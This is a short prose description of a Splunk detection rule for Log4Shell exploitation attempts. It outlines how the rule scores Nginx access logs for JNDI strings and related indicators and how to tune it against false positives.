This detection rule targets the Log4Shell vulnerability (CVE-2021-44228) by leveraging the Splunk Web Datamodel to identify exploitation attempts through HTTP headers. The rule evaluates incoming HTTP requests for patterns and indicators that are characteristic of an attack vector leveraged by Log4Shell. Key indicators assessed include JNDI strings, which are potential triggers for remote code execution, environment variable references often exploited in attacks, and specific URI patterns that may suggest the presence of malicious payloads. The detection mechanism operates by parsing Nginx access logs searching for these exploit patterns, utilizing a series of regex matches to score logs against plausible exploitation attempts. If certain thresholds are met (Score > 2), these logs are highlighted for further investigation, allowing security teams to respond to potential threats effectively. Given the high-risk nature of this vulnerability, it's critical for organizations to differentiate between actual threats and false positives. The rule accommodates ongoing log analysis to enhance detection fidelity, and recommendations for fine-tuning the scoring mechanics are provided to minimize the risk of overlooking true positives while avoiding excessive noise from benign logs.